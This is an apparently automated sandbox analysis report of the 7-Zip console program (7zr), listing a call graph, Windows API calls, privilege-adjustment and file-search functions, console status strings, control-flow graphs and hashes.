77251->77253 77252 cb2611 _CxxThrowException 77252->77248 77360 ca859e malloc _CxxThrowException free _CxxThrowException 77253->77360 77256 cc7b52 __EH_prolog 77255->77256 77380 cc7eec 77256->77380 77258 cc7ca4 77258->77056 77260 ca2e04 malloc _CxxThrowException 77267 cc7b63 77260->77267 77261 ca30ea malloc _CxxThrowException free 77261->77267 77263 ca1e40 free ctype 77263->77267 77265 cb12a5 5 API calls 77265->77267 77266 ce04d2 5 API calls 77266->77267 77267->77258 77267->77260 77267->77261 77267->77263 77267->77265 77267->77266 77268 ca429a 3 API calls 77267->77268 77270 cc7c61 memcpy 77267->77270 77271 cc7193 free 77267->77271 77385 cc70ea 77267->77385 77388 cc7a40 77267->77388 77406 cc7cc3 6 API calls 77267->77406 77407 cc74eb malloc _CxxThrowException memcpy __EH_prolog ctype 77267->77407 77268->77267 77270->77267 77271->77267 77272->77058 77273->77064 77274->77063 77275->77066 77276->77066 77277->77066 77278->77071 77279->77074 77280->77123 77281->77123 77282->77123 77283->77123 77284->77123 77285->77123 77286->77123 77287->77079 77288->77114 77289->77114 77290->77114 77291->77114 77292->77114 77293->77086 77306->77132 77308 ca2f1c 2 API calls 77307->77308 77311 cb29fe 77308->77311 77310 cb1f7e 77310->77141 77340 cc1d73 5 API calls __EH_prolog 77310->77340 77371 ca1e40 free 77311->77371 77313 cb2ab3 __EH_prolog 77312->77313 77314 ca2e8a 2 API calls 77313->77314 77319 cb2b0f 77313->77319 77315 cb2af4 77314->77315 77372 cb2a61 malloc _CxxThrowException free _CxxThrowException memcpy 77315->77372 77316 cb22ad 77316->77172 77316->77174 77318 cb2b04 77373 ca1e40 free 77318->77373 77319->77316 77320 cb2bc6 77319->77320 77327 cb2b9f 77319->77327 77374 cb2cb4 48 API calls 2 library calls 77319->77374 77375 cb2bf5 8 API calls __EH_prolog 77319->77375 77376 cb2a61 malloc _CxxThrowException free _CxxThrowException memcpy 77319->77376 77378 cc1d73 5 API calls __EH_prolog 77320->77378 77323 cb2bd6 _CxxThrowException 77323->77316 77327->77316 77377 cc1d73 5 API calls __EH_prolog 77327->77377 77329 cb2bb8 _CxxThrowException 77329->77320 77333 cb3856 __EH_prolog 77330->77333 77331 ca2e04 malloc _CxxThrowException 77331->77333 77332 ca2fec 3 API calls 77332->77333 77333->77331 77333->77332 77334 ce04d2 5 API calls 77333->77334 77335 ca2f88 3 API calls 77333->77335 77337 ca1e40 free ctype 77333->77337 77338 cb3917 77333->77338 77379 cb3b76 malloc _CxxThrowException __EH_prolog ctype 77333->77379 77334->77333 77335->77333 77337->77333 77338->77182 77339->77139 77340->77144 77341->77152 77342->77154 77343->77156 77344->77158 77345->77164 77346->77163 77347->77173 77348->77179 77349->77216 77350->77216 77351->77226 77352->77212 77353->77222 77354->77224 77355->77229 77356->77238 77357->77243 77358->77245 77359->77252 77360->77246 77361->77192 77362->77194 77363->77213 77364->77230 77365->77240 77366->77241 77367->77239 77368->77207 77369->77198 77370->77206 77371->77310 77372->77318 77373->77319 77374->77319 77375->77319 77376->77319 77377->77329 77378->77323 77379->77333 77381 cc7f14 77380->77381 77383 cc7ef7 77380->77383 77381->77267 77382 cc7193 free 77382->77383 77383->77381 77383->77382 77408 ca1e40 free 77383->77408 77386 ca2e04 2 API calls 77385->77386 77387 cc7103 77386->77387 77387->77267 77389 cc7a4a __EH_prolog 77388->77389 77409 ca361b 6 API calls 2 library calls 77389->77409 77391 cc7a78 77410 ca361b 6 API calls 2 library calls 77391->77410 77393 cc7b20 77412 cd2db9 free ctype 77393->77412 77395 ca2e04 malloc _CxxThrowException 77400 cc7a83 77395->77400 77396 cc7b2b 77413 cd2db9 free ctype 77396->77413 77398 cc7b37 77398->77267 77399 ca2fec 3 API calls 77399->77400 77400->77393 77400->77395 77400->77399 77401 ca2fec 3 API calls 77400->77401 77402 ce04d2 5 API calls 77400->77402 77405 ca1e40 free ctype 77400->77405 77411 cc7955 malloc _CxxThrowException __EH_prolog ctype 77400->77411 77403 cc7aca wcscmp 77401->77403 77402->77400 77403->77400 77405->77400 77406->77267 77407->77267 77408->77383 77409->77391 77410->77400 77411->77400 77412->77396 77413->77398 77414 d26ba3 VirtualFree 77415 d37da0 WaitForSingleObject 77416 d37dc1 77415->77416 77417 d37dbb GetLastError 77415->77417 77418 d37dce CloseHandle 77416->77418 77419 d37ddf 77416->77419 77417->77416 77418->77419 77420 d37dd9 GetLastError 77418->77420 77420->77419 77421 cccefb 77422 ccd0cc 77421->77422 77423 cccf03 77421->77423 77423->77422 77468 cccae9 VariantClear 77423->77468 77425 cccf59 77425->77422 77469 cccae9 VariantClear 77425->77469 77427 cccf71 77427->77422 77470 cccae9 VariantClear 77427->77470 77429 cccf87 77429->77422 77471 cccae9 VariantClear 77429->77471 77431 cccf9d 77431->77422 77472 cccae9 VariantClear 77431->77472 77433 cccfb3 77433->77422 77473 cccae9 VariantClear 77433->77473 77435 cccfc9 77435->77422 77474 ca4504 malloc _CxxThrowException 77435->77474 77437 cccfdc 77438 ca2e04 2 API calls 77437->77438 77440 cccfe7 77438->77440 77439 ccd009 77441 ccd07b 77439->77441 77443 ccd080 77439->77443 77444 ccd030 77439->77444 77440->77439 77442 ca2f88 3 API calls 77440->77442 77482 ca1e40 free 77441->77482 77442->77439 77479 cc7a0c CharUpperW 77443->77479 77447 ca2e04 2 API calls 77444->77447 77450 ccd038 77447->77450 77448 ccd0c4 77483 ca1e40 free 77448->77483 77449 ccd08b 77480 cbfdbc 4 API calls 2 library calls 77449->77480 77452 ca2e04 2 API calls 77450->77452 77454 ccd046 77452->77454 77475 cbfdbc 4 API calls 2 library calls 77454->77475 77455 ccd0a7 77457 ca2fec 3 API calls 77455->77457 77459 ccd0b3 77457->77459 77458 ccd057 77460 ca2fec 3 API calls 77458->77460 77481 ca1e40 free 77459->77481 77462 ccd063 77460->77462 77476 ca1e40 free 77462->77476 77464 ccd06b 77477 ca1e40 free 77464->77477 77466 ccd073 77478 ca1e40 free 77466->77478 77468->77425 77469->77427 77470->77429 77471->77431 77472->77433 77473->77435 77474->77437 77475->77458 77476->77464 77477->77466 77478->77441 77479->77449 77480->77455 77481->77441 77482->77448 77483->77422 77484 cac3bd 77485 cac3ca 77484->77485 77486 cac3db 77484->77486 77485->77486 77488 ca1e40 free 77485->77488 77488->77486 77489 cd5475 77490 ca2fec 3 API calls 77489->77490 77491 cd54b4 77490->77491 77492 cdc911 24 API calls 77491->77492 77493 cd54bb 77492->77493 77494 cdadb7 77495 cdadc1 __EH_prolog 77494->77495 77496 ca26dd 2 API calls 77495->77496 77497 cdae1d 77496->77497 77498 ca2e04 2 API calls 77497->77498 77499 cdae38 77498->77499 77500 ca2e04 2 API calls 77499->77500 77501 cdae44 77500->77501 77502 ca2e04 2 API calls 77501->77502 77503 cdae68 77502->77503 77504 cdad29 2 API calls 77503->77504 77505 cdae85 77504->77505 77510 cdaf2d 77505->77510 77507 cdae94 77508 ca2e04 2 API calls 77507->77508 77509 cdaeb2 77508->77509 77511 cdaf37 __EH_prolog 77510->77511 77522 cb34f4 malloc _CxxThrowException __EH_prolog 77511->77522 77513 cdafac 77514 ca2e04 2 API calls 77513->77514 77515 cdafbb 77514->77515 77516 ca2e04 2 API calls 77515->77516 77517 cdafca 77516->77517 77518 ca2e04 2 API calls 77517->77518 77519 cdafd9 77518->77519 77520 ca2e04 2 API calls 77519->77520 77521 cdafe8 77520->77521 77521->77507 77522->77513 77523 ce8eb1 77528 ce8ed1 77523->77528 77526 ce8ec9 77529 ce8edb __EH_prolog 77528->77529 77537 ce9267 77529->77537 77533 ce8efd 77542 cde5f1 free ctype 77533->77542 77535 ce8eb9 77535->77526 77536 ca1e40 free 77535->77536 77536->77526 77539 ce9271 __EH_prolog 77537->77539 77543 ca1e40 free 77539->77543 77540 ce8ef1 77541 ce922b free CloseHandle GetLastError ctype 77540->77541 77541->77533 77542->77535 77543->77540

                            Executed Functions

                            Function 00CA9313 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1028 ca9313-ca9338 GetCurrentProcess OpenProcessToken 1029 ca933a-ca934a LookupPrivilegeValueW 1028->1029 1030 ca9390 1028->1030 1031 ca934c-ca9370 AdjustTokenPrivileges 1029->1031 1032 ca9382 1029->1032 1033 ca9393-ca9398 1030->1033 1031->1032 1034 ca9372-ca9380 GetLastError 1031->1034 1035 ca9385-ca938e CloseHandle 1032->1035 1034->1035 1035->1033
                            APIs
                            • GetCurrentProcess.KERNEL32(00000020,00CB1EC5,?,7597AB50,?,?,?,?,00CB1EC5,00CB1CEF), ref: 00CA9329
                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00CB1EC5,00CB1CEF), ref: 00CA9330
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 00CA9342
                            • AdjustTokenPrivileges.KERNELBASE(00CB1EC5,00000000,?,00000000,00000000,00000000), ref: 00CA9368
                            • GetLastError.KERNEL32 ref: 00CA9372
                            • CloseHandle.KERNELBASE(00CB1EC5,?,?,?,?,00CB1EC5,00CB1CEF), ref: 00CA9388
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                            • String ID: SeRestorePrivilege
                            • API String ID: 3398352648-1684392131
                            • Opcode ID: 393a2fe640bebc28a53bfe1b32ff98ef4d65345da23ad873c23979b4d66c2f96
                            • Instruction ID: 9cdb20d2354a12f22ea69b706664d58896e22b0f5a99d2bf109fa1f580632fe7
                            • Opcode Fuzzy Hash: 393a2fe640bebc28a53bfe1b32ff98ef4d65345da23ad873c23979b4d66c2f96
                            • Instruction Fuzzy Hash: 67016D7A946219ABCB605FF19C4ABDE7F7CEF07244F045164A541E2290D6758608D7B0
                            Function 00CB3D66 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1036 cb3d66-cb3d9c call d3fb10 GetCurrentProcess call cb3e04 OpenProcessToken 1041 cb3d9e-cb3dbe LookupPrivilegeValueW 1036->1041 1042 cb3de3-cb3dfe call cb3e04 1036->1042 1041->1042 1043 cb3dc0-cb3dd3 AdjustTokenPrivileges 1041->1043 1043->1042 1045 cb3dd5-cb3de1 GetLastError 1043->1045 1045->1042
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CB3D6B
                            • GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00CB3D7D
                            • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00CB3D94
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00CB3DB6
                            • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00CB3DCB
                            • GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00CB3DD5
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ProcessToken$AdjustCurrentErrorH_prologLastLookupOpenPrivilegePrivilegesValue
                            • String ID: SeSecurityPrivilege
                            • API String ID: 3475889169-2333288578
                            • Opcode ID: eef79f01822a79d62d11d55fb80803fbf08be4a5c96174a4041ede2e1060ef12
                            • Instruction ID: 7f8b8c91387d7b864c071244143215bc21ed92e4642246be61222f2c6f01b59b
                            • Opcode Fuzzy Hash: eef79f01822a79d62d11d55fb80803fbf08be4a5c96174a4041ede2e1060ef12
                            • Instruction Fuzzy Hash: F4115EB5951259AFDF10EFA5DC85AFEFBBCFB05344F004529E412E2290DB358A08CA70
                            Function 00CE81EC Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 995COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CE81F1
                              • Part of subcall function 00CEF749: _CxxThrowException.MSVCRT(?,00D54A58), ref: 00CEF792
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionH_prologThrow
                            • String ID:
                            • API String ID: 461045715-3916222277
                            • Opcode ID: 4adf57e62320855930b72c8455e134c13c773faaa20f158770f3cef98c09a731
                            • Instruction ID: ce9d7d320c8082d0fd4bb047e1c8459287aa240f3102a9886b3845f7a7dc2413
                            • Opcode Fuzzy Hash: 4adf57e62320855930b72c8455e134c13c773faaa20f158770f3cef98c09a731
                            • Instruction Fuzzy Hash: 8792A230900289DFDF15DFA9C844BAEBBB1BF15304F244099E819AB392CB75DE49DB61
                            Function 00CA6868 Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CA686D
                              • Part of subcall function 00CA6848: FindClose.KERNELBASE(00000000,?,00CA6880), ref: 00CA6853
                            • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 00CA68A5
                            • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 00CA68DE
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: Find$FileFirst$CloseH_prolog
                            • String ID:
                            • API String ID: 3371352514-0
                            • Opcode ID: c1f32d54269ad7a1a87acc4e8f21c7cbb2783034d641d583015fe804ef4e5284
                            • Instruction ID: e72ecd1178e4fb8b1c1d011364708d4a9e6769a68ce9704bfe73a063f8116858
                            • Opcode Fuzzy Hash: c1f32d54269ad7a1a87acc4e8f21c7cbb2783034d641d583015fe804ef4e5284
                            • Instruction Fuzzy Hash: DB11043140020ADBCF10EF64C8555EDB778EF12328F144229E9A0571D1DB358EC5EB50
                            Function 00CDA013 Relevance: 56.7, APIs: 15, Strings: 17, Instructions: 690COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 cda013-cda01a 1 cda37a-cda544 call ce04d2 call ca1524 call ce04d2 call ca1524 call ca1e0c 0->1 2 cda020-cda02d call cb1ac8 0->2 64 cda546-cda54f call cdb0fa 1->64 65 cda551 1->65 8 cda22e-cda235 2->8 9 cda033-cda03a 2->9 13 cda23b-cda24d call cdb4f6 8->13 14 cda367-cda375 call cdb55f 8->14 11 cda03c-cda042 9->11 12 cda054-cda089 call cd92d3 9->12 11->12 17 cda044-cda04f call ca30ea 11->17 28 cda099 12->28 29 cda08b-cda091 12->29 25 cda24f-cda253 13->25 26 cda259-cda2fb call cc7ebb call ca27bb call ca26dd call cc3d70 call cdad99 call ca27bb 13->26 30 cdac23-cdac2a 14->30 17->12 25->26 91 cda2fd 26->91 92 cda303-cda362 call cdb6ab call cd2db9 call ca1e40 * 2 call cdbff8 26->92 34 cda09d-cda0de call ca2fec call cdb369 28->34 29->28 33 cda093-cda097 29->33 35 cdac2c-cdac33 30->35 36 cdac3a-cdac66 call cdb96d call ca1e40 call cc3247 30->36 33->34 55 cda0ea-cda0fa 34->55 56 cda0e0-cda0e4 34->56 35->36 41 cdac35 35->41 69 cdac6e-cdacb5 call ca1e40 call ca11c2 call cdbe0c call cd2db9 36->69 70 cdac68-cdac6a 36->70 46 cdac35 call cdb988 41->46 46->36 60 cda10d 55->60 61 cda0fc-cda102 55->61 56->55 68 cda114-cda19e call ca2fec call cc7ebb call cdad99 60->68 61->60 67 cda104-cda10b 61->67 66 cda553-cda55c 64->66 65->66 73 cda55e-cda560 66->73 74 cda564-cda5c1 call ca2fec call cdb277 66->74 67->68 104 cda1a2 call ccf8e0 68->104 70->69 73->74 97 cda5cd-cda652 call cdad06 call cdbf3e call cb3a29 call ca2e04 call cc4345 74->97 98 cda5c3-cda5c7 74->98 91->92 92->30 136 cda654-cda671 call cc375c call cdb96d 97->136 137 cda676-cda6c8 call cc2096 97->137 98->97 108 cda1a7-cda1b1 104->108 112 cda1c0-cda1c9 108->112 113 cda1b3-cda1bb call cdc7d7 108->113 115 cda1cb 112->115 116 cda1d1-cda229 call cdb6ab call cd2db9 call ca1e40 call cdbfa4 call cd940b 112->116 113->112 115->116 116->30 136->137 143 cda6cd-cda6d6 137->143 146 cda6d8-cda6dd call cdc7d7 143->146 147 cda6e2-cda6e5 143->147 146->147 150 cda72e-cda73a 147->150 151 cda6e7-cda6ee 147->151 154 cda73c-cda74a call ca1fa0 150->154 155 cda79e-cda7aa 150->155 152 cda6f0-cda71d call ca1fa0 fputs call ca1fa0 call ca1fb3 call ca1fa0 151->152 153 cda722-cda725 151->153 152->153 153->150 159 cda727 153->159 170 cda74c-cda753 154->170 171 cda755-cda799 fputs call ca2201 call ca1fa0 fputs call ca2201 call ca1fa0 154->171 157 cda7ac-cda7b2 155->157 158 cda7d9-cda7e5 155->158 157->158 162 cda7b4-cda7d4 fputs call ca2201 call ca1fa0 157->162 164 cda818-cda81a 158->164 165 cda7e7-cda7ed 158->165 159->150 162->158 167 cda81c-cda82b 164->167 168 cda899-cda8a5 164->168 165->168 172 cda7f3-cda813 fputs call ca2201 call ca1fa0 165->172 178 cda82d-cda84c fputs call ca2201 call ca1fa0 167->178 179 cda851-cda85d 167->179 175 cda8e9-cda8ed 168->175 176 cda8a7-cda8ad 168->176 170->155 170->171 171->155 172->164 183 cda8ef 175->183 188 cda8f6-cda8f8 175->188 176->183 184 cda8af-cda8c2 call ca1fa0 176->184 178->179 179->168 187 cda85f-cda872 call ca1fa0 179->187 183->188 184->183 207 cda8c4-cda8e4 fputs call ca2201 call ca1fa0 184->207 187->168 209 cda874-cda894 fputs call ca2201 call ca1fa0 187->209 196 cdaaaf-cdaaeb call cc43b3 call ca1e40 call cdc104 call cdad82 188->196 197 cda8fe-cda90a 188->197 246 cdac0b-cdac1e call cd2db9 * 2 196->246 247 cdaaf1-cdaaf7 196->247 204 cda910-cda91f 197->204 205 cdaa73-cdaa89 call ca1fa0 197->205 204->205 211 cda925-cda929 204->211 205->196 223 cdaa8b-cdaaaa fputs call ca2201 call ca1fa0 205->223 207->175 209->168 211->196 212 cda92f-cda93d 211->212 219 cda93f-cda964 fputs call ca2201 call ca1fa0 212->219 220 cda96a-cda971 212->220 219->220 228 cda98f-cda9a8 fputs call ca2201 220->228 229 cda973-cda97a 220->229 223->196 241 cda9ad-cda9bd call ca1fa0 228->241 229->228 234 cda97c-cda982 229->234 234->228 239 cda984-cda98d 234->239 239->228 244 cdaa06-cdaa1f fputs call ca2201 239->244 241->244 252 cda9bf-cdaa01 fputs call ca2201 call ca1fa0 fputs call ca2201 call ca1fa0 241->252 251 cdaa24-cdaa29 call ca1fa0 244->251 246->30 247->246 259 cdaa2e-cdaa4b fputs call ca2201 251->259 252->244 263 cdaa50-cdaa5b call ca1fa0 259->263 263->196 268 cdaa5d-cdaa71 call ca1fa0 call cd710e 263->268 268->196
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$ExceptionThrow
                            • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $N
                            • API String ID: 3665150552-429544124
                            • Opcode ID: e8c8cd6f4c34f8551bda9afa31fe3be3dfdf30e6ec4815c4b9b33757e3fd56be
                            • Instruction ID: 13d80fd090416b2ec454cfb62ff9d6ed8c435198c72b34fadef1479194b97272
                            • Opcode Fuzzy Hash: e8c8cd6f4c34f8551bda9afa31fe3be3dfdf30e6ec4815c4b9b33757e3fd56be
                            • Instruction Fuzzy Hash: 8F529C30904259DFCF26EBA4CC85BEDBBB5AF44304F14419AE559A3291DB706F88EF21
                            Function 00CDA42C Relevance: 56.5, APIs: 15, Strings: 17, Instructions: 503COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 274 cda42c-cda433 275 cda449-cda4df call cd545d call ca2e04 call cc1858 call ca1e40 274->275 276 cda435-cda444 fputs call ca1fa0 274->276 286 cda4ee-cda4f1 275->286 287 cda4e1-cda4e9 call cdc7d7 275->287 276->275 289 cda50e-cda520 call cdc73e 286->289 290 cda4f3-cda4fa 286->290 287->286 295 cdac0b-cdac2a call cd2db9 * 2 289->295 296 cda526-cda544 call ca1e0c 289->296 290->289 291 cda4fc-cda509 call cd57fb 290->291 291->289 307 cdac2c-cdac33 295->307 308 cdac3a-cdac66 call cdb96d call ca1e40 call cc3247 295->308 304 cda546-cda54f call cdb0fa 296->304 305 cda551 296->305 306 cda553-cda55c 304->306 305->306 311 cda55e-cda560 306->311 312 cda564-cda5c1 call ca2fec call cdb277 306->312 307->308 313 cdac35 call cdb988 307->313 327 cdac6e-cdacb5 call ca1e40 call ca11c2 call cdbe0c call cd2db9 308->327 328 cdac68-cdac6a 308->328 311->312 325 cda5cd-cda652 call cdad06 call cdbf3e call cb3a29 call ca2e04 call cc4345 312->325 326 cda5c3-cda5c7 312->326 313->308 348 cda654-cda671 call cc375c call cdb96d 325->348 349 cda676-cda6d6 call cc2096 325->349 326->325 328->327 348->349 355 cda6d8-cda6dd call cdc7d7 349->355 356 cda6e2-cda6e5 349->356 355->356 358 cda72e-cda73a 356->358 359 cda6e7-cda6ee 356->359 362 cda73c-cda74a call ca1fa0 358->362 363 cda79e-cda7aa 358->363 360 cda6f0-cda71d call ca1fa0 fputs call ca1fa0 call ca1fb3 call ca1fa0 359->360 361 cda722-cda725 359->361 360->361 361->358 367 cda727 361->367 378 cda74c-cda753 362->378 379 cda755-cda799 fputs call ca2201 call ca1fa0 fputs call ca2201 call ca1fa0 362->379 365 cda7ac-cda7b2 363->365 366 cda7d9-cda7e5 363->366 365->366 370 cda7b4-cda7d4 fputs call ca2201 call ca1fa0 365->370 372 cda818-cda81a 366->372 373 cda7e7-cda7ed 366->373 367->358 370->366 375 cda81c-cda82b 372->375 376 cda899-cda8a5 372->376 373->376 380 cda7f3-cda813 fputs call ca2201 call ca1fa0 373->380 386 cda82d-cda84c fputs call ca2201 call ca1fa0 375->386 387 cda851-cda85d 375->387 383 cda8e9-cda8ed 376->383 384 cda8a7-cda8ad 376->384 378->363 378->379 379->363 380->372 391 cda8ef 383->391 396 cda8f6-cda8f8 383->396 384->391 392 cda8af-cda8c2 call ca1fa0 384->392 386->387 387->376 395 cda85f-cda872 call ca1fa0 387->395 391->396 392->391 415 cda8c4-cda8e4 fputs call ca2201 call ca1fa0 392->415 395->376 417 cda874-cda894 fputs call ca2201 call ca1fa0 395->417 404 cdaaaf-cdaaeb call cc43b3 call ca1e40 call cdc104 call cdad82 396->404 405 cda8fe-cda90a 396->405 404->295 454 cdaaf1-cdaaf7 404->454 412 cda910-cda91f 405->412 413 cdaa73-cdaa89 call ca1fa0 405->413 412->413 419 cda925-cda929 412->419 413->404 431 cdaa8b-cdaaaa fputs call ca2201 call ca1fa0 413->431 415->383 417->376 419->404 420 cda92f-cda93d 419->420 427 cda93f-cda964 fputs call ca2201 call ca1fa0 420->427 428 cda96a-cda971 420->428 427->428 436 cda98f-cda9a8 fputs call ca2201 428->436 437 cda973-cda97a 428->437 431->404 449 cda9ad-cda9bd call ca1fa0 436->449 437->436 442 cda97c-cda982 437->442 442->436 447 cda984-cda98d 442->447 447->436 452 cdaa06-cdaa4b fputs call ca2201 call ca1fa0 fputs call ca2201 447->452 449->452 458 cda9bf-cdaa01 fputs call ca2201 call ca1fa0 fputs call ca2201 call ca1fa0 449->458 467 cdaa50-cdaa5b call ca1fa0 452->467 454->295 458->452 467->404 472 cdaa5d-cdaa71 call ca1fa0 call cd710e 467->472 472->404
                            APIs
                            • fputs.MSVCRT(Scanning the drive for archives:), ref: 00CDA43E
                              • Part of subcall function 00CA1FA0: fputc.MSVCRT ref: 00CA1FA7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputcfputs
                            • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $!"$N
                            • API String ID: 269475090-3104439828
                            • Opcode ID: d70155a3f8e29104d92e0bfe487bb196d091dfd3f589aefe563f2b0a5eb90b09
                            • Instruction ID: 436a0092793807a9983f12bffe423467d79280f41bad12403c59ab831e6658d1
                            • Opcode Fuzzy Hash: d70155a3f8e29104d92e0bfe487bb196d091dfd3f589aefe563f2b0a5eb90b09
                            • Instruction Fuzzy Hash: 09228B30904259DFDF2AEBA4C885BEDFBF1AF44304F14419AE95963291DB706E84EF21
                            Function 00CD993D Relevance: 44.3, APIs: 16, Strings: 9, Instructions: 569COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
